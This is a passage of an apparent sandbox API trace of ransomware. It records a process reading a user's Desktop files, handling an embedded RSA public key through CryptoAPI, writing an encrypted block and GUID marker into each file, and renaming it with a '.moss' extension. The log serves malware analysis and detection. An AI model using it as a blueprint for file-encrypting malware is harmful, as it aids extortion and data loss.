0x2d80000 [0170.222] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xebf9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.222] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.223] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.223] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xec1f, lpOverlapped=0x0) returned 1 [0170.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.224] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.224] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.224] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.225] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.225] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.225] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.225] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.225] GetLastError () returned 0x0 [0170.225] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.225] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.225] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.226] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.226] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.226] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.227] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xec1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.227] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.227] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.227] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.227] CloseHandle (hObject=0x664) returned 1 [0170.229] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2UgGdV0vuu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\2uggdv0vuu.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2UgGdV0vuu.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\2uggdv0vuu.bmp.moss")) returned 1 [0170.229] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.229] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.229] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.231] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.231] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c1d670, ftCreationTime.dwHighDateTime=0x1d5d870, ftLastAccessTime.dwLowDateTime=0x5c840ca0, ftLastAccessTime.dwHighDateTime=0x1d5e506, ftLastWriteTime.dwLowDateTime=0x5c840ca0, ftLastWriteTime.dwHighDateTime=0x1d5e506, nFileSizeHigh=0x0, nFileSizeLow=0x15e73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2X6VH2.m4a", cAlternateFileName="")) returned 1 [0170.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2X6VH2.m4a") returned=".m4a" [0170.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\2X6VH2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\2x6vh2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.231] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=89715) returned 1 [0170.231] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.235] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15e4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.235] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.236] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x15e73, lpOverlapped=0x0) returned 1 [0170.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.237] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.238] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.238] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.238] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.238] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.238] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.238] GetLastError () returned 0x0 [0170.238] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.238] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.238] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.238] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.238] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.238] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.238] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.238] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.238] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.238] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x15e70) returned 0x3b62d40 [0170.239] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.239] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c088 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc248 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c0d0 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc260 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc290 [0170.239] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2a8 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.240] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc290 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2a8 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc290 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0170.240] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc290 | out: hHeap=0xcd0000) returned 1 [0170.240] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.241] GetCurrentThreadId () returned 0x324 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49fe0 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.241] GetCurrentThreadId () returned 0x324 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.241] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.241] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc290 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2a8 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc278 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.242] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0170.242] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2c0 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc290 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc290 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0170.243] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.243] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x35f7c30 [0170.243] HeapFree (in: 